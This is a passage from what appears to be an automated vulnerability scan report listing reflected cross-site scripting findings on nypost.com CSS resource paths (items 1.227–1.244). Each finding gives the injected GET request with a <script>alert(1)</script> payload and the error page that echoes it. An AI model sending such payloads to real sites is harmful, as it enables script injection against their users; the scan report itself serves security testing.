<p>/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css65850<script>alert(1)</script>b4a82bde358</p>
...[SNIP]...

1.227. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e0bb<script>alert(1)</script>341c7e99cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig4e0bb<script>alert(1)</script>341c7e99cf/WebPortal/nypost/blocks/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig4e0bb<script>alert(1)</script>341c7e99cf/WebPortal/nypost/blocks/hot_topics/hot_topics.css</p>
...[SNIP]...

1.228. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 208e3<script>alert(1)</script>315a306eca7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal208e3<script>alert(1)</script>315a306eca7/nypost/blocks/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal208e3<script>alert(1)</script>315a306eca7/nypost/blocks/hot_topics/hot_topics.css</p>
...[SNIP]...

1.229. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97698<script>alert(1)</script>52bff809a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost97698<script>alert(1)</script>52bff809a2/blocks/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost97698<script>alert(1)</script>52bff809a2/blocks/hot_topics/hot_topics.css</p>
...[SNIP]...

1.230. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1ba05<script>alert(1)</script>1ec9bb3b14c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1ba05<script>alert(1)</script>1ec9bb3b14c/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1ba05<script>alert(1)</script>1ec9bb3b14c/hot_topics/hot_topics.css</p>
...[SNIP]...

1.231. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4dc7a<script>alert(1)</script>f0b6cfcc4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics4dc7a<script>alert(1)</script>f0b6cfcc4/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics4dc7a<script>alert(1)</script>f0b6cfcc4/hot_topics.css</p>
...[SNIP]...

1.232. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a7a6c<script>alert(1)</script>4dabacaeab7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.cssa7a6c<script>alert(1)</script>4dabacaeab7 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.cssa7a6c<script>alert(1)</script>4dabacaeab7</p>
...[SNIP]...

1.233. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5c5f<script>alert(1)</script>f09d03ad0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigc5c5f<script>alert(1)</script>f09d03ad0c/WebPortal/nypost/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigc5c5f<script>alert(1)</script>f09d03ad0c/WebPortal/nypost/blocks/markets/markets.css</p>
...[SNIP]...

1.234. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 879fd<script>alert(1)</script>3721b0ad5ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal879fd<script>alert(1)</script>3721b0ad5ba/nypost/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal879fd<script>alert(1)</script>3721b0ad5ba/nypost/blocks/markets/markets.css</p>
...[SNIP]...

1.235. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b7f5<script>alert(1)</script>15074911464 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost4b7f5<script>alert(1)</script>15074911464/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost4b7f5<script>alert(1)</script>15074911464/blocks/markets/markets.css</p>
...[SNIP]...

1.236. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1912c<script>alert(1)</script>f29ff77d1e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1912c<script>alert(1)</script>f29ff77d1e2/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1912c<script>alert(1)</script>f29ff77d1e2/markets/markets.css</p>
...[SNIP]...

1.237. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9dbf8<script>alert(1)</script>5b449c7fdd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/markets9dbf8<script>alert(1)</script>5b449c7fdd/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/markets9dbf8<script>alert(1)</script>5b449c7fdd/markets.css</p>
...[SNIP]...

1.238. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3a03b<script>alert(1)</script>7e857a3241b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css3a03b<script>alert(1)</script>7e857a3241b HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css3a03b<script>alert(1)</script>7e857a3241b</p>
...[SNIP]...

1.239. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b225<script>alert(1)</script>0d0497a7126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig7b225<script>alert(1)</script>0d0497a7126/WebPortal/nypost/blocks/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig7b225<script>alert(1)</script>0d0497a7126/WebPortal/nypost/blocks/media_nav/media_nav.css</p>
...[SNIP]...

1.240. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb4cc<script>alert(1)</script>9c3cd6a2728 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortalbb4cc<script>alert(1)</script>9c3cd6a2728/nypost/blocks/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalbb4cc<script>alert(1)</script>9c3cd6a2728/nypost/blocks/media_nav/media_nav.css</p>
...[SNIP]...

1.241. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2f65<script>alert(1)</script>8c80e29cec1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostb2f65<script>alert(1)</script>8c80e29cec1/blocks/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostb2f65<script>alert(1)</script>8c80e29cec1/blocks/media_nav/media_nav.css</p>
...[SNIP]...

1.242. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8563a<script>alert(1)</script>38ee9ec9c37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks8563a<script>alert(1)</script>38ee9ec9c37/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks8563a<script>alert(1)</script>38ee9ec9c37/media_nav/media_nav.css</p>
...[SNIP]...

1.243. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 336c6<script>alert(1)</script>3bf9820cf40 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/media_nav336c6<script>alert(1)</script>3bf9820cf40/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/media_nav336c6<script>alert(1)</script>3bf9820cf40/media_nav.css</p>
...[SNIP]...

1.244. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 9e777<script>alert(1)</script>06ce6d4472 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css9e777<script>alert(1)</script>06ce6d4472 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

